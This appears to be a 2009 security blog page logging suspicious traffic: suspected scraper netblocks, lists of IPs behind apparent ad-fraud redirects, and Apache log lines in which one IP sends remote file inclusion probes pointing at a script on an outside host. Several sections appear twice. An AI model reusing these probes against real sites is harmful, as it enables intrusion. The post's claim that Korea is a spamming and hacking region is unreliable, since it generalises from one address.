Traffic from these two networks have been monitoring one of our site, possibly scraping content.
Rackspace.com, Ltd. RSCP-NET-4 (NET-174-143-0-0-1)
174.143.0.0 - 174.143.255.255
Slicehost RSPC-1251808572434376 (NET-174-143-180-0-1)
174.143.180.0 - 174.143.183.255
Object Software Development SEANET-CBLK (NET-199-181-164-0-1)
199.181.164.0 - 199.181.168.255
Seanet Corporation SEANET01-NET01 (NET-199-181-165-0-1)
199.181.165.0 - 199.181.167.255
Trends from the trenches of Internet traffic. Hackers, spammers and Internet abuse. IP address database. DNS sightings. Views and opinions expressed are my own. ~ Teri Radichel @teriradichel
Monday, October 19, 2009
Monday, October 12, 2009
Bad Traffic from Korea
Not sure what this nonsense is and how it is even getting directed to our server. The web addresses below are not even on our server but somehow this showed up in our logs and generating errors:
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-"
"Mozilla/5.0" -
This is coming from a common spamming/hacking part of the world - Korea:
inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-"
"Mozilla/5.0" -
This is coming from a common spamming/hacking part of the world - Korea:
inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR
Saturday, October 10, 2009
Strange Traffic in Logs - a bunch from Canada
There is something bizarre going on in our logs. It is interesting that the first of such links comes from aQuantive - now Microsoft advertising.
We have a site that is running some Google advertising supposedly (did not set this up myself). There is a bunch of traffic - all from different networks in Canada - where these visitors hit that ad landing page, then jump over to another web site on our server.
For this particular company, it is highly unlikely that 10 or 20 visitors per day in Canada are clicking on their ads legitimately (if that is in fact the source).
Additionally there are strange Google redirect links in our logs, and a lot of searches in Google.ca (Google Canada) that are ending up at this site.
One thing I noticed is that initial attempts at this type of traffic were coming from international locations other than Canada, some of which we have blocked. Perhaps because they cannot get to the site via these locations they set up shop in Canada and attempt to access our site through some weird redirect through a form. Will have to keep looking into that.
The traffic started on September 1st 2009. Here are the IP addresses involved:
10/9/2009 8:30:38 PM 70.83.96.135
10/9/2009 8:27:18 PM 70.83.96.135
10/9/2009 4:52:29 PM 99.240.97.84
10/9/2009 12:54:38 PM 99.248.203.79
10/9/2009 9:07:30 AM 24.186.175.130
10/9/2009 9:06:41 AM 24.186.175.130
10/9/2009 9:06:22 AM 24.186.175.130
10/9/2009 9:05:35 AM 24.186.175.130
10/9/2009 9:04:51 AM 24.186.175.130
10/9/2009 9:04:06 AM 216.239.45.19
10/9/2009 9:03:34 AM 216.239.45.19
10/9/2009 9:02:25 AM 216.239.45.19
10/8/2009 11:52:36 PM 98.111.75.233
10/8/2009 11:41:25 AM 99.230.181.71
10/8/2009 11:41:03 AM 99.230.181.71
10/8/2009 11:16:19 AM 65.254.6.82
10/8/2009 11:10:52 AM 68.178.43.83
10/8/2009 11:05:59 AM 24.177.28.130
10/8/2009 10:23:32 AM 70.79.189.119
10/8/2009 10:23:26 AM 70.79.189.119
10/8/2009 10:18:40 AM 98.243.28.190
10/8/2009 9:24:55 AM 71.126.247.202
10/8/2009 7:37:24 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/7/2009 10:25:02 PM 76.174.128.45
10/7/2009 9:48:20 PM 98.247.76.189
10/7/2009 9:46:38 PM 98.247.76.189
10/7/2009 9:38:59 PM 98.247.76.189
10/6/2009 12:02:20 PM 64.62.114.34
10/5/2009 9:13:58 PM 98.247.76.189
10/5/2009 9:13:18 PM 98.247.76.189
10/5/2009 9:12:00 PM 98.247.76.189
10/5/2009 4:29:15 PM 64.105.65.4
10/5/2009 8:09:05 AM 24.18.190.143
10/2/2009 5:58:09 PM 98.247.76.189
10/2/2009 5:09:25 PM 98.247.76.189
10/2/2009 4:12:45 PM 98.247.76.189
10/2/2009 3:57:34 PM 98.247.76.189
10/2/2009 3:46:32 PM 98.247.76.189
10/2/2009 7:48:34 AM 64.105.65.105
9/29/2009 4:47:54 PM 67.171.17.196
9/28/2009 4:49:28 PM 70.102.156.98
9/24/2009 1:25:39 PM 72.86.22.146
9/24/2009 1:01:32 PM 72.86.22.146
9/21/2009 3:58:43 PM 76.22.80.65
9/10/2009 2:14:01 PM 76.28.231.49
9/2/2009 4:24:01 PM 71.39.140.20
9/1/2009 3:09:50 PM 216.99.5.100
9/1/2009 3:09:23 PM 216.99.5.100
We have a site that is running some Google advertising supposedly (did not set this up myself). There is a bunch of traffic - all from different networks in Canada - where these visitors hit that ad landing page, then jump over to another web site on our server.
For this particular company, it is highly unlikely that 10 or 20 visitors per day in Canada are clicking on their ads legitimately (if that is in fact the source).
Additionally there are strange Google redirect links in our logs, and a lot of searches in Google.ca (Google Canada) that are ending up at this site.
One thing I noticed is that initial attempts at this type of traffic were coming from international locations other than Canada, some of which we have blocked. Perhaps because they cannot get to the site via these locations they set up shop in Canada and attempt to access our site through some weird redirect through a form. Will have to keep looking into that.
The traffic started on September 1st 2009. Here are the IP addresses involved:
10/9/2009 8:30:38 PM 70.83.96.135
10/9/2009 8:27:18 PM 70.83.96.135
10/9/2009 4:52:29 PM 99.240.97.84
10/9/2009 12:54:38 PM 99.248.203.79
10/9/2009 9:07:30 AM 24.186.175.130
10/9/2009 9:06:41 AM 24.186.175.130
10/9/2009 9:06:22 AM 24.186.175.130
10/9/2009 9:05:35 AM 24.186.175.130
10/9/2009 9:04:51 AM 24.186.175.130
10/9/2009 9:04:06 AM 216.239.45.19
10/9/2009 9:03:34 AM 216.239.45.19
10/9/2009 9:02:25 AM 216.239.45.19
10/8/2009 11:52:36 PM 98.111.75.233
10/8/2009 11:41:25 AM 99.230.181.71
10/8/2009 11:41:03 AM 99.230.181.71
10/8/2009 11:16:19 AM 65.254.6.82
10/8/2009 11:10:52 AM 68.178.43.83
10/8/2009 11:05:59 AM 24.177.28.130
10/8/2009 10:23:32 AM 70.79.189.119
10/8/2009 10:23:26 AM 70.79.189.119
10/8/2009 10:18:40 AM 98.243.28.190
10/8/2009 9:24:55 AM 71.126.247.202
10/8/2009 7:37:24 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/7/2009 10:25:02 PM 76.174.128.45
10/7/2009 9:48:20 PM 98.247.76.189
10/7/2009 9:46:38 PM 98.247.76.189
10/7/2009 9:38:59 PM 98.247.76.189
10/6/2009 12:02:20 PM 64.62.114.34
10/5/2009 9:13:58 PM 98.247.76.189
10/5/2009 9:13:18 PM 98.247.76.189
10/5/2009 9:12:00 PM 98.247.76.189
10/5/2009 4:29:15 PM 64.105.65.4
10/5/2009 8:09:05 AM 24.18.190.143
10/2/2009 5:58:09 PM 98.247.76.189
10/2/2009 5:09:25 PM 98.247.76.189
10/2/2009 4:12:45 PM 98.247.76.189
10/2/2009 3:57:34 PM 98.247.76.189
10/2/2009 3:46:32 PM 98.247.76.189
10/2/2009 7:48:34 AM 64.105.65.105
9/29/2009 4:47:54 PM 67.171.17.196
9/28/2009 4:49:28 PM 70.102.156.98
9/24/2009 1:25:39 PM 72.86.22.146
9/24/2009 1:01:32 PM 72.86.22.146
9/21/2009 3:58:43 PM 76.22.80.65
9/10/2009 2:14:01 PM 76.28.231.49
9/2/2009 4:24:01 PM 71.39.140.20
9/1/2009 3:09:50 PM 216.99.5.100
9/1/2009 3:09:23 PM 216.99.5.100
Subscribe to:
Posts (Atom)